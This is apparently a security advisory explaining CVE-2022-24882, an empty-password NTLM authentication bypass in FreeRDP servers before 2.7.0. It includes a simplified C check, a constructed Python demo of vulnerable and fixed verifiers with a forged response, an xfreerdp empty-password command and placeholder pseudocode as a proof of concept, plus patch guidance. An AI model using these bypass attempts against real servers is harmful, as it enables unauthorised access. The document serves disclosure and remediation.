Remote Desktop Protocol (RDP) is a backbone technology for remote administration on Windows and compatible platforms. FreeRDP, a popular open-source implementation of RDP, is used widely – not just for clients, but as the core of many custom and third-party RDP server setups. But in 2022, a critical authentication flaw emerged that compromised security for any FreeRDP-based RDP servers.
What is CVE-2022-24882?
This vulnerability affects the NT LAN Manager (NTLM) authentication code in FreeRDP before version 2.7.0, on the server side of the exchange. An RDP server that authenticates a connecting user is supposed to require a non-empty password. Because of a bug, when an empty password value was supplied the NTLM authentication routine did not abort as it should; the exchange was allowed to proceed further than it ever should have, even though no valid authentication had taken place.
This only affects servers built on FreeRDP, not RDP clients.
How is This a Vulnerability?
The main issue: an empty password must always cause an immediate authentication failure, before any further processing. Letting the exchange continue with an empty password could let an attacker:
- Establish a session without knowing any real credentials
- Possibly escalate this into unauthorized access, depending on how the server handles post-authentication flows
Servers that integrate FreeRDP as their backbone are directly threatened by this. If you deploy or maintain RDP services on Linux — or use FreeRDP’s core for any remote desktop gateway — you must update.
The Code Flaw in Detail
Let's look at a simplified version to show what went wrong.
Vulnerable Code Snippet
Somewhere in a server's authentication path the password associated with the authentication attempt is checked. Before 2.7.0, FreeRDP's NTLM server code did not reject an empty password at that point. A simplified version (not FreeRDP's actual code) of the check that should be present looks like:
/* Refuse to continue if no password was supplied at all */
if (password == NULL || strlen(password) == 0) {
    /* Abort the authentication process before any response is computed */
    return AUTH_FAIL;
}
In the vulnerable code this check was missing or in the wrong place, so the authentication process continued even though the password was empty.
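To make the consequence concrete, here is an added example (written for this page; it is not FreeRDP code and does not model FreeRDP's internals) of a challenge-response verifier in the shape the page describes: one version without the empty-password abort, one with it. It reads the advisory's "empty password value" as an identity whose password is empty on the server side; that reading, the credential store, the account names and the use of HMAC-SHA-256 in place of NTLM's MD4/HMAC-MD5 are all assumptions made for the example. The point it shows is why the check must come first: the key derived from an empty password is public knowledge, so anyone can produce a matching response without holding any secret.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass

# Constructed sample credential store (hypothetical). This is what the server
# side of the exchange knows about each account; "svc_kiosk" has an empty password.
CREDENTIALS = {
    "alice": "correct horse battery staple",
    "svc_kiosk": "",
}

AUTH_OK = "AUTH_OK"
AUTH_FAIL = "AUTH_FAIL"


def password_key(password: str) -> bytes:
    """Stand-in for the NT hash. Real NTLM uses MD4 over the UTF-16LE password;
    SHA-256 is used here only so the example runs on any Python build."""
    return hashlib.sha256(password.encode("utf-16-le")).digest()


def challenge_response(password: str, server_challenge: bytes, client_nonce: bytes) -> bytes:
    """Simplified NTLMv2-style response: a keyed MAC over both nonces."""
    return hmac.new(password_key(password), server_challenge + client_nonce, hashlib.sha256).digest()


@dataclass(frozen=True)
class Attempt:
    user: str
    client_nonce: bytes
    response: bytes


def verify_vulnerable(attempt: Attempt, server_challenge: bytes) -> str:
    """Pre-2.7.0 shape: no empty-password abort, so the expected response is
    computed from whatever the stored password is, including ""."""
    password = CREDENTIALS.get(attempt.user)
    if password is None:
        return AUTH_FAIL
    expected = challenge_response(password, server_challenge, attempt.client_nonce)
    return AUTH_OK if hmac.compare_digest(expected, attempt.response) else AUTH_FAIL


def verify_fixed(attempt: Attempt, server_challenge: bytes) -> str:
    """Adds the check the page describes: an empty password fails immediately,
    before any response is computed or compared."""
    password = CREDENTIALS.get(attempt.user)
    if password is None or len(password) == 0:
        return AUTH_FAIL
    expected = challenge_response(password, server_challenge, attempt.client_nonce)
    return AUTH_OK if hmac.compare_digest(expected, attempt.response) else AUTH_FAIL


def forge_attempt(user: str, server_challenge: bytes) -> Attempt:
    """What an attacker with no secret can do: answer the challenge using the
    key derived from the empty password, which anyone can compute."""
    nonce = os.urandom(8)
    return Attempt(user, nonce, challenge_response("", server_challenge, nonce))


def legitimate_attempt(user: str, password: str, server_challenge: bytes) -> Attempt:
    nonce = os.urandom(8)
    return Attempt(user, nonce, challenge_response(password, server_challenge, nonce))


def demo() -> dict:
    """Run the forged and legitimate attempts through both verifiers."""
    challenge = os.urandom(8)
    return {
        "forged_vs_vulnerable": verify_vulnerable(forge_attempt("svc_kiosk", challenge), challenge),
        "forged_vs_fixed": verify_fixed(forge_attempt("svc_kiosk", challenge), challenge),
        "forged_alice_vs_vulnerable": verify_vulnerable(forge_attempt("alice", challenge), challenge),
        "alice_vs_fixed": verify_fixed(legitimate_attempt("alice", CREDENTIALS["alice"], challenge), challenge),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The forged attempt against the empty-password account is accepted by the vulnerable verifier and rejected by the fixed one, while the forged attempt against an account with a real password fails in both and the legitimate attempt still succeeds. Note that the fixed verifier returns before touching the MAC at all; placing the check after the comparison would not help, because the comparison itself is what the attacker can satisfy.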
Exploiting CVE-2022-24882: Proof of Concept
Scenario: Attack an RDP server running an affected FreeRDP version.
Goal: Bypass authentication by submitting an empty password.
Example with xfreerdp (for illustration)
xfreerdp /v:server.address /u:targetuser /p:""
xfreerdp is the FreeRDP client; it is used here only as a convenient way to submit an empty password to the server under test, and the client itself is not affected. If the server is vulnerable, it may let you initiate a session or proceed further in the authentication flow. The exact result depends on server-side controls beyond FreeRDP, but at a minimum the attempt will not be rejected immediately, as it should be.
In Python (using RDP libraries)
# Pseudocode: "rdp" is a placeholder for whichever RDP client library you use;
# no library with this exact API is assumed to exist.
import rdp
session = rdp.Session("server.address")
session.authenticate(username="targetuser", password="")  # Empty password
print(session.status)  # Against a vulnerable server this may report success
Note: These samples illustrate the problem. Actual exploitation success depends on the specific server logic and how it reacts post-NTLM.
Real-World Impact
- Organizations with custom RDP servers: Exposed to unauthorized logins from external or internal attackers.
- Managed RDP appliances: Third-party RDP appliances or virtualized desktops that bundle FreeRDP may be affected without their operators knowing, since the library version is not always visible.
- Penetration testers/red teamers: May use this flaw to demonstrate the consequences of out-of-date RDP platforms.
How to Fix It
Upgrade FreeRDP to 2.7.0 or later on ALL RDP servers. If your server links against a system package, `pkg-config --modversion freerdp2` shows which library version it is built against; for bundled or vendored copies, check the version the product ships.
There is no workaround. If your server depends on FreeRDP, patch immediately.
Relevant patch:
GitHub commit fixing CVE-2022-24882
References and Further Reading
- CVE-2022-24882 at GitHub Security Advisory
- NVD Details for CVE-2022-24882
- FreeRDP Official Site
- Patch Commit on GitHub
TL;DR
If you're running a FreeRDP-based RDP server, upgrade right now to at least version 2.7.0. This vulnerability is critical, cheap to attempt, and has no known workaround.
Stay secure — patch early, patch often!
Timeline
Published on: 04/26/2022 16:15:00 UTC
Last modified on: 05/11/2022 04:15:00 UTC